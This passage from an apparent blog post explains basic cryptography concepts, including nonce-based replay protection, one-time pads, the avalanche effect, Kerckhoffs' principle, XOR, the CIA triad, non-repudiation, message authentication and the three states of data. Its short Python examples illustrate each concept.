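    return secrets.token_bytes(16)

def client_response(password: str, nonce: bytes) -> bytes:
    # Hash of nonce || password: differs every session, so a recorded
    # response is useless to a replay attacker
    return hashlib.sha256(nonce + password.encode()).digest()

def server_verify(known_password: str, nonce: bytes, response: bytes) -> bool:
    expected = hashlib.sha256(nonce + known_password.encode()).digest()
    return secrets.compare_digest(expected, response)

nonce = server_issue_nonce()
response = client_response("hunter2", nonce)
assert server_verify("hunter2", nonce, response)
```

Because the server never accepts the same nonce twice, replaying yesterday's recorded `response` fails: it was computed over a nonce that is no longer valid.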

One-time pad (OTP)

One-time pads are a mainly theoretical encryption device which, in theory, provides the strongest possible cipher. This carries some caveats, however, in that the key must be provided and used properly within a strict set of rules. The theory behind the one-time pad is that the key must be at least the same length as the plaintext message and must be truly random. The key and the plaintext are then combined using the most fundamental of encryption devices, the modulo-2 adder, otherwise known as the exclusive OR (XOR) gate. The result, given a secure key which has not been compromised, is cipher-text which has no direct relation to the original plaintext. To decrypt, the same key is used and the operation reversed. For this to be completely secure, even in theory, the following rules must be observed without exception:

  • The OTP (key) MUST be truly random
  • The OTP must be at least as long as the plaintext original
  • Only two copies of the OTP should exist
  • The OTP must be used only once
  • Both copies of the OTP must be destroyed immediately after use

The OTP process is absolutely safe if and only if the preceding rules are strictly obeyed. Before computers, this was a time-consuming and error-prone task which rendered it all but impractical unless carried out by machines such as dedicated telegraphy encryption/decryption devices; nowadays, however, it can readily be automated by a computer.
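Automating the pad on a computer really is this short. The sketch below implements the XOR combination described above; it is illustrative only, since `secrets.token_bytes` is a CSPRNG rather than the true random source the first rule demands, and the key handling rules (single use, destruction) are of course not enforced by the code.

```python
import secrets

def otp_encrypt(plaintext: bytes, key: bytes) -> bytes:
    # Combine message and pad byte-by-byte with the modulo-2 adder (XOR)
    assert len(key) >= len(plaintext), "key must be at least as long as the message"
    return bytes(p ^ k for p, k in zip(plaintext, key))

# XOR is its own inverse, so decryption is the identical operation
otp_decrypt = otp_encrypt

message = b"ATTACK AT DAWN"
key = secrets.token_bytes(len(message))  # stand-in for a truly random pad

ciphertext = otp_encrypt(message, key)
assert otp_decrypt(ciphertext, key) == message
```

The fact that `otp_decrypt` is literally the same function as `otp_encrypt` previews the point made in the XOR section below: the operation's reversibility is what makes it the workhorse of symmetric ciphers.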

Surprisingly perhaps, manual OTP ciphers are still used today for sending secret messages to agents (spies) via what are known as numbers stations, or one-way voice links (OWVL), both of which typically use HF transmission and can routinely be heard on the short wave (HF) radio bands.

Avalanche effect

When it comes to encryption, one of the most attractive properties of cryptography is the avalanche effect, in which a small change to the input produces a very different cipher-text: two slightly different keys generate very different cipher-text for the same plaintext, and two slightly different plaintexts generate very different cipher-text under the same key. As previously discussed, this is a source of the confusion and diffusion Shannon defined as desirable. We can therefore measure or compare the efficacy of two encryption algorithms with reference to the avalanche effect they bring about. Plaintext and encryption key are mapped to binary before the encryption process; the avalanche effect is then calculated by changing one bit of the plaintext whilst keeping the key constant and, separately, by changing one bit of the key whilst keeping the plaintext constant. Empirical results show that the most secure algorithms exhibit the most significant avalanche effect.
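The measurement is easy to sketch. Here I use SHA-256 as the stand-in primitive (a hash rather than a keyed cipher, to keep the example to the standard library): flip a single bit of the input and count how many of the 256 output bits change. The helper name `bit_diff` is my own.

```python
import hashlib

def bit_diff(a: bytes, b: bytes) -> int:
    # Hamming distance: count of differing bits between equal-length strings
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

m1 = b"the quick brown fox"
m2 = bytearray(m1)
m2[0] ^= 0x01  # flip exactly one bit of the input

h1 = hashlib.sha256(m1).digest()
h2 = hashlib.sha256(bytes(m2)).digest()

# A strong primitive flips roughly half of the 256 output bits
print(bit_diff(h1, h2))
```

For a well-behaved primitive the count hovers around 128, i.e. about 50% of the output bits; an algorithm that consistently flipped far fewer would be leaking structure from its input.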

Kerckhoffs’ principle

Auguste Kerckhoffs was a linguist and military cryptographer of the late 19th century who had many essays on contemporary cryptography published in his day. A quote attributed to him from 1883 states:

‘Military cipher systems should not require secrecy, and it should not be a problem if they fall into enemy hands; a cryptographic system should be secure even if everything about the system, except the key, is public knowledge’

Auguste Kerckhoffs (1883)

In other words, the key must be kept secret, not the algorithm.

XOR function

The XOR function has a unique place in cryptography, and you may well ask: why this function? Why not the AND gate or the OR gate? The answer is strikingly simple: the XOR operation is reversible. If a string of binary data is passed through the XOR function along with a key, then the output, if passed through another XOR function with the same key, reproduces the original input.
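That round-trip property takes two lines to demonstrate, and contrasting it with AND or OR shows why they would never do. This is just a sketch of the algebra, not any particular cipher:

```python
data = 0b10110010
key = 0b01101100

# XOR twice with the same key restores the original exactly
cipher = data ^ key
assert cipher ^ key == data

# AND and OR destroy information, so there is no way back:
# e.g. from (data & key) == 0 you cannot tell whether a data bit was 0 or 1.

# The same property holds byte-wise over a buffer and a key stream
buf = b"hello"
keystream = b"\x5a" * len(buf)  # toy repeating key, purely for illustration
enc = bytes(b ^ k for b, k in zip(buf, keystream))
dec = bytes(b ^ k for b, k in zip(enc, keystream))
assert dec == buf
```

In algebraic terms, every value is its own inverse under XOR (`x ^ x == 0`), which is precisely what AND and OR lack.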

The XOR is a binary operation described as a logic gate in a way that facilitates analysis with Karnaugh maps and the rest of the associated digital logic canon; taken out of the realm of digital logic circuits, however, it is simply a way of expressing modulo-2 addition without a carry. We will investigate the utility of XOR/modulo-2 adders in more detail in future posts and I will add links to them below as they are published.

Confidentiality, Integrity and Availability

Confidentiality, Integrity and Availability are collectively known as the CIA triad in the cyber security world, and represent the three main elements of a fundamental model of the properties of a secure system. For example, a banking application, whose security must certainly be beyond doubt, must exhibit confidentiality (it must prevent any unauthorised access), integrity (it must be a true reflection of the reality of the bank accounts and safe from unauthorised modification) and availability (it must be usable whenever it is needed). In cryptography we are not overly concerned with availability, as it is not directly relevant to the field, but a secure system will most certainly lose its availability if it loses its confidentiality or suffers a compromise of its integrity.

Again, we will look at these premises in more detail in other posts so it is sufficient for now to state them in this context.


Non-repudiation

Were it not the case that CIA makes such a handy mnemonic, non-repudiation would very likely stand alongside confidentiality, integrity and availability as the fourth principle of a secure system. As it is, it is an addendum to the axiom, but an essential one nonetheless.

In a secure system we can think of non-repudiation as the application of an audit trail, provided perhaps by logging. By logging every transaction, interaction and modification of a system, and more importantly logging the identity of the entity responsible for initiating each of these actions, we ensure that the system under scrutiny is able to maintain its status.

By providing mechanisms which ensure non-repudiation, we provide an important means of ensuring the survivability of a system through a compromise and beyond, hopefully restored to a secure state once again.

For readers familiar with the reactive/proactive bow-tie model of system assurance, non-repudiation sits very firmly on the reactive side but is essential to a survivable, robust, secure environment.

Data origin and entity authentication

The subject of the authentication of data origin and entities is a complex and detailed one. Essentially, it is the affirmation that the entity believed to be the source of some data in an interaction is who or what it is believed to be. Ultimately, the receiver needs confidence that the message has not been intercepted and/or modified in transit, and this is accomplished by verifying the identity of the source of the message.

So, how do you prevent an attacker from manipulating messages in transit between a transaction source and its destination? The major considerations are as follows:

  • The recipient must confirm that messages from a source have not been modified along the way.
  • The recipient must confirm that messages from a source are indeed from that source.

Data origin authentication is the solution to these problems. The recipient, by verifying that messages have not been tampered with in transit (data integrity) and that they originate from the expected sender (data authenticity), confirms both of the considerations bulleted above. Entity authentication assures that entities are currently and actively involved in a communication session; in cryptography, this can be done using freshness, as discussed earlier.
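One common mechanism for achieving both properties at once (not the only one, but the simplest to sketch) is a message authentication code. The example below uses Python's standard `hmac` module with a shared secret key; the message content is of course invented for illustration.

```python
import hashlib
import hmac
import secrets

# Shared secret, distributed out-of-band between sender and recipient
key = secrets.token_bytes(32)

# Sender computes a tag over the message and transmits both
message = b"transfer 100 to account 42"
tag = hmac.new(key, message, hashlib.sha256).digest()

# Recipient recomputes the tag with the shared key and compares in
# constant time: a match proves integrity AND that the sender held the key
ok = hmac.compare_digest(hmac.new(key, message, hashlib.sha256).digest(), tag)

# A tampered message fails verification against the original tag
forged = b"transfer 999 to account 13"
tampered = hmac.compare_digest(hmac.new(key, forged, hashlib.sha256).digest(), tag)

print(ok, tampered)  # True False
```

An attacker without the key can neither forge a valid tag for a modified message (authenticity) nor modify the message undetected (integrity), which is exactly the pair of bulleted guarantees above.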

The three states of data

In distributed computer systems such as computer networks of any size, the data held, shared and processed by the computational hosts is defined as being in one of three states: at rest, in transit or in use. Ultimately it is the job of, and indeed the raison d'être for, our cryptographic algorithms to protect this data, and in each of these three states that job takes on a slightly nuanced form.


Data-at-rest (storage)

This is data stored on media such as magnetic disk drives, optical media or tapes. All data at rest must be physically stored on some form of device, and where it requires confidentiality and integrity protection it must be encrypted. Discussion of this topic must wrestle with architectural considerations such as whether to encrypt the whole device or just the files themselves; even the additional cost to the environment of the energy consumed by large-scale encryption of data at rest falls into this discussion.

Data-in-transit (motion)

Data in transit is data on the move. Moving can mean across space from a satellite to the earth, across oceans through an undersea fibre-optic cable, across free space on a town centre public Wi-Fi system, across an office building through the corporate network, or even across a computer architecture from the data bus to the CPU. As you probably suspect, each of these cases has its own nuanced features, but there are also common overarching considerations appropriate to all of them. This is an enormous field of activity, so let it suffice for now that the treatment of data in transmission must be considered carefully and dealt with appropriately.

Data-in-use (processing)

As you might expect, data in use is data currently being processed by a CPU, or indeed by an end user as it is displayed on a screen. This classification can sometimes seem a little anomalous, and it is certainly the most difficult of the three states in which to assure ourselves that data is protected in all the ways we wish it to be. It is almost a given that data must be decrypted in order to be used, and therefore encryption offers minimal protection to data in this state.


Thank you for reading this far in a post which could perhaps have seemed a little like the contents page of a book. The analogy is, I hope, a sound one, as this post contains some of the most core elements of the cryptographic landscape. I've mentioned here and there that I intend to add links from each of the sections of this document to other relevant resources as I post them, and hopefully, if enough time has passed between my writing this and your landing here to read it, that will be evidenced above. Check back again in the future and look at the links here, or even the categories and tags for the blog, as it is my firm intention to make this a living document.

It's a blogger's cliché, but I would really appreciate your comments, good and bad. I'm committed to displaying them all here and, do that, I will; whatever the motivation, it's great to get involved in dialogue, whether here on the blog, on Twitter or elsewhere.